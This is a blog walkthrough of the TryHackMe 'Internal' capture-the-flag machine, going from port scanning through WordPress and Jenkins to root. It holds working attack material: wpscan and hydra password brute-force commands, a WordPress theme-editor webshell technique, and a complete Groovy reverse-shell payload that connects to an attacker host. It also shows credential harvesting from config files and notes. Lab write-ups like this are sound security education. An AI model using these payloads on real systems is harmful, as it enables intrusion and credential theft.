BLOG
Internal[Tryhackme]
Jul 11, 2021 |
12 minutes read
Categories: walkthrough
Tags: tryhackme, thm, wordpress, wpscan, phpmyadmin, Linux-Machine, Port-Forwarding, Jenkins
Internal Walkthrough
Port Scan
$ nmap -p1-65535 10.10.20.128 -T5
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 08:41 IST
Initiating Ping Scan at 08:41
Scanning 10.10.20.128 [2 ports]
Completed Ping Scan at 08:41, 0.17s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:41
Completed Parallel DNS resolution of 1 host. at 08:41, 6.51s elapsed
DNS resolution of 1 IPs took 6.51s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 08:41
Scanning 10.10.20.128 [2 ports]
Discovered open port 80/tcp on 10.10.20.128
Discovered open port 22/tcp on 10.10.20.128
Completed Connect Scan at 08:41, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.20.128
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-07-09 08:41:35 IST for 6s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
Service Scan
$ nmap -sV -sC -p22,80 10.10.20.128
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 08:43 IST
Nmap scan report for 10.10.20.128
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.78 seconds
Enumeration
22/tcp open ssh OpenSSH 7.6p1 Ubuntu
No Public Exploits
Only Option is brute force. which we will keep as last resort
80/tcp open http Apache httpd 2.4.29
Adding internal.thm to /etc/hosts
echo "<IP> internal.thm" >> /etc/hosts
Navigating to the web address, we have Default homepage
Let’s Fuzz for directories
$ ffuf -t 200 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://internal.thm/FUZZ -ic -e .php,.html,.txt,.php3,.php5,php7
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v1.3.1-dev
________________________________________________
:: Method : GET
:: URL : http://internal.thm/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
:: Extensions : .php .html .txt .php3 .php5 php7
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 200
:: Matcher : Response status: 200,204,301,302,307,401,403,405
________________________________________________
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
wordpress [Status: 301, Size: 316, Words: 20, Lines: 10]
javascript [Status: 301, Size: 317, Words: 20, Lines: 10]
blog [Status: 301, Size: 311, Words: 20, Lines: 10]
phpmyadmin [Status: 301, Size: 317, Words: 20, Lines: 10]
[Status: 200, Size: 10918, Words: 3499, Lines: 376]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [1543829/1543829] :: Job [1/1] :: 828 req/sec :: Duration: [0:29:46] :: Errors: 0 ::
Enumerating the directories
From the snaps, the website is running on wordpress and admin has posted a post.
Lets run wpscan for more enumeration
$ wpscan --url http://internal.thm/wordpress
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://internal.thm/wordpress/ [10.10.20.128]
[+] Started: Fri Jul 9 10:08:35 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://internal.thm/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://internal.thm/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://internal.thm/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://internal.thm/blog/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://internal.thm/blog/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentyseventeen
| Location: http://internal.thm/wordpress/wp-content/themes/twentyseventeen/
| Last Updated: 2021-04-27T00:00:00.000Z
| Readme: http://internal.thm/wordpress/wp-content/themes/twentyseventeen/readme.txt
| [!] The version is out of date, the latest version is 2.7
| Style URL: http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507
| Style Name: Twenty Seventeen
| Style URI: https://wordpress.org/themes/twentyseventeen/
| Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 2.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://internal.thm/blog/wp-content/themes/twentyseventeen/style.css?ver=20190507, Match: 'Version: 2.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jul 9 10:08:50 2021
[+] Requests Done: 172
[+] Cached Requests: 5
[+] Data Sent: 38.706 KB
[+] Data Received: 359.73 KB
[+] Elapsed time: 00:00:15
WP has Version 5.4.2 and it didn’t have any public exploits
Lets brute force the login.
$ wpscan --url http://internal.thm/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt
[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / [REDACTD]
Trying admin / summertime Time: 00:00:53 < > (4000 / 14348392) 0.02% ETA: ??:??:??
[!] Valid Combinations Found:
| Username: admin, Password: [REDACTED]
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Jul 9 10:23:23 2021
[+] Requests Done: 4173
[+] Cached Requests: 6
[+] Data Sent: 1.953 MB
[+] Data Received: 2.706 MB
[+] Elapsed time: 00:01:12
Using credentials to login into wordpress
Exploitation
with some search engine dorking, we can find how to get a reverse shell using wordpress.
Through Dashboard> Apperance> themeeditor
Edited one of the php script, but unable to activate it.
With help of search engine, we can know where this files resides
By navigating to
http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php
We got the reverse shell.
Spawning TTY
$ python -c 'import pty; pty.spawn("/bin/bash")'
www-data@internal:/var/www/html/wordpress/wp-admin$
www-data@internal:/var/www/html/wordpress/wp-admin$ ^Z
[1] + 3089 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 3089 continued nc -nlvp 9898
www-data@internal:/var/www/html/wordpress/wp-admin$ export TERM=xterm
There is no access to user directory
www-data@internal:/var/www/html/wordpress/wp-admin$ ls -l /home
total 4
drwx------ 7 aubreanna aubreanna 4096 Aug 3 2020 aubreanna
www-data@internal:/var/www/html/wordpress/wp-admin$
Checking for open sockets
www-data@internal:/var/www/html/wordpress/wp-admin$ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 128 127.0.0.1:8080 0.0.0.0:*
LISTEN 0 128 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 128 127.0.0.1:38331 0.0.0.0:*
LISTEN 0 128 *:80 *:*
LISTEN 0 128 [::]:22 [::]:*
www-data@internal:/var/www/html/wordpress/wp-admin$
We have Maria/mysql DB running in the server and from our enumeration phase we have phpmyadmin login page.
Let’s Enumerate phpmyadmin for db login credentials
www-data@internal:/var/www/html/wordpress/wp-admin$ cd /
www-data@internal:/$ find / -type d -name phpmyadmin 2> /dev/null
/var/lib/phpmyadmin
/etc/phpmyadmin
/usr/share/dbconfig-common/scripts/phpmyadmin
/usr/share/dbconfig-common/data/phpmyadmin
/usr/share/doc/phpmyadmin
/usr/share/phpmyadmin
www-data@internal:/$ cd /etc/phpmyadmin
www-data@internal:/etc/phpmyadmin$ ls
apache.conf config.footer.inc.php htpasswd.setup phpmyadmin.service
conf.d config.header.inc.php lighttpd.conf
config-db.php config.inc.php phpmyadmin.desktop
www-data@internal:/etc/phpmyadmin$ less config-db.php
www-data@internal:/etc/phpmyadmin$
$dbuser='phpmyadmin';
$dbpass= [REDACTED] ;
$basepath='';
$dbname='phpmyadmin';
$dbserver='localhost';
$dbport='3306';
$dbtype='mysql';
Using the credentials to login into DB
www-data@internal:/$ mysql -u phpmyadmin -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 99
Server version: 5.7.31-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| phpmyadmin |
+--------------------+
[...snip...]
mysql> select * from pma__users;
Empty set (0.00 sec)
mysql> quit
Bye
There is nothing much on DB.
Using other methods
www-data@internal:/$ find /home /var /opt -type f -perm /a+r -name "*.txt" 2>/dev/null
/var/log/installer/installer-journal.txt
/var/www/html/wordpress/license.txt
/var/www/html/wordpress/wp-includes/images/crystal/license.txt
/var/www/html/wordpress/wp-includes/ID3/readme.txt
/var/www/html/wordpress/wp-includes/ID3/license.txt
/var/www/html/wordpress/wp-includes/ID3/license.commercial.txt
/var/www/html/wordpress/wp-includes/js/plupload/license.txt
/var/www/html/wordpress/wp-includes/js/swfupload/license.txt
/var/www/html/wordpress/wp-includes/js/tinymce/license.txt
/var/www/html/wordpress/wp-content/plugins/akismet/readme.txt
/var/www/html/wordpress/wp-content/plugins/akismet/changelog.txt
/var/www/html/wordpress/wp-content/plugins/akismet/LICENSE.txt
/var/www/html/wordpress/wp-content/themes/twentytwenty/readme.txt
/var/www/html/wordpress/wp-content/themes/twentyseventeen/readme.txt
/var/www/html/wordpress/wp-content/themes/twentynineteen/readme.txt
/var/lib/cloud/instances/iid-datasource-none/vendor-data.txt
/var/lib/cloud/instances/iid-datasource-none/user-data.txt
/var/lib/cloud/instances/iid-datasource-none/cloud-config.txt
/opt/wp-save.txt
www-data@internal:/$ less /opt/wp-save.txt
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna: [REDACTED]
Using the credentials,
we are able to login with aubreanna user and got the user flag
aubreanna@internal:~$ cat jenkins.txt
Internal Jenkins service is running on 172.17.0.2:8080
PrivEsc
Using traditional tactics to find PrivEsc Vulnerabilites
$ aubreanna@internal:~$ id
uid=1000(aubreanna) gid=1000(aubreanna) groups=1000(aubreanna),4(adm),24(cdrom),30(dip),46(plugdev)
aubreanna@internal:~$ sudo -l
[sudo] password for aubreanna:
Sorry, user aubreanna may not run sudo on internal.
$ aubreanna@internal:~$ find / -type f -perm /4000 -exec ls -l {} \; 2>/dev/null
-rwsr-xr-x 1 root root 43088 Mar 5 2020 /bin/mount
-rwsr-xr-x 1 root root 26696 Mar 5 2020 /bin/umount
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
-rwsr-xr-x 1 root root 30800 Aug 11 2016 /bin/fusermount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 18448 Jun 28 2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 75824 Mar 22 2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 40344 Mar 22 2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 76496 Mar 22 2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 37136 Mar 22 2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 59640 Mar 22 2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 44528 Mar 22 2019 /usr/bin/chsh
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwsr-xr-x 1 root root 149080 Jan 31 2020 /usr/bin/sudo
-rwsr-xr-x 1 root root 22520 Mar 27 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 10232 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 100760 Nov 23 2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 14328 Mar 27 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 113528 Jul 10 2020 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 436552 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 root messagebus 42992 Jun 11 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
$ aubreanna@internal:~$ find / -type f -perm /2000 -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root tty 14328 Jan 17 2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root crontab 39352 Nov 16 2017 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /usr/bin/chage
-rwsr-sr-x 1 daemon daemon 51464 Feb 20 2018 /usr/bin/at
-rwxr-sr-x 1 root ssh 362640 Mar 4 2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 43088 Mar 1 2018 /usr/bin/mlocate
-rwxr-sr-x 1 root tty 30800 Mar 5 2020 /usr/bin/wall
-rwxr-sr-x 1 root utmp 10232 Mar 11 2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
$ aubreanna@internal:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
Lets try to get on to jenkins on port 8080 for any possibilities
$ ssh -L 58553:localhost:8080 [email protected]
[email protected]'s password:
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jul 9 21:24:47 UTC 2021
System load: 0.03 Processes: 116
Usage of /: 63.7% of 8.79GB Users logged in: 0
Memory usage: 45% IP address for eth0: 10.10.28.128
Swap usage: 0% IP address for docker0: 172.17.0.1
=> There is 1 zombie process.
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
0 packages can be updated.
0 updates are security updates.
aubreanna@internal:~$
The default username for Jenkins is admin. Lets bruteforce the login page to get the password.
$ hydra -l admin -P /usr/share/wordlists/rockyou.txt localhost -s 58553 http-form-post '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password'
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-10 03:12:21
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://localhost:58553/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in:Invalid username or password
[58553][http-post-form] host: localhost login: admin password: [REDACTED]
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-10 03:13:22
We logged on to Jenkins Dasboard using obtained credentials
Jenkins has script console which runs groovy script.
Using groovy for getting the shell
String host="<IP>";
int port=8585;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
We got the shell
$ nc -nlvp 8585
listening on [any] 8585 ...
pwd
whoami
jenkins
python -c 'import pty; pty.spawn("/bin/bash")'
jenkins@jenkins:/$
jenkins@jenkins:/$ ^Z
[2] + 4616 suspended nc -nlvp 8585
$ stty raw -echo; fg
[2] - 4616 continued nc -nlvp 8585
jenkins@jenkins:/$ export TERM=xterm
jenkins@jenkins:/$
We got the credentials and we got to know its a container
jenkins@jenkins:/opt$ find /etc /home /opt /var -type f -perm /a+r -name "*.txt" 2> /dev/null
/opt/note.txt
/var/jenkins_home/userContent/readme.txt
/var/jenkins_home/war/images/atom-license.txt
/var/jenkins_home/war/scripts/combobox-readme.txt
/var/jenkins_home/war/WEB-INF/update-center-rootCAs/jenkins-update-center-root-ca.txt
/var/jenkins_home/war/WEB-INF/update-center-rootCAs/jenkins-update-center-root-ca-2.txt
/var/jenkins_home/war/WEB-INF/classes/dependencies.txt
/var/jenkins_home/war/dc-license.txt
/var/jenkins_home/war/robots.txt
/var/jenkins_home/war/css/font-awesome/fonts/LICENSE.txt
/var/jenkins_home/war/css/font-awesome/css/LICENSE.txt
/var/jenkins_home/war/css/google-fonts/roboto/LICENSE.txt
jenkins@jenkins:/opt$ cat note.txt
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you
need access to the root user account.
root: [REDACTED]
jenkins@jenkins:/opt$
By using the credentials obtained in container on the target
we got the root flag
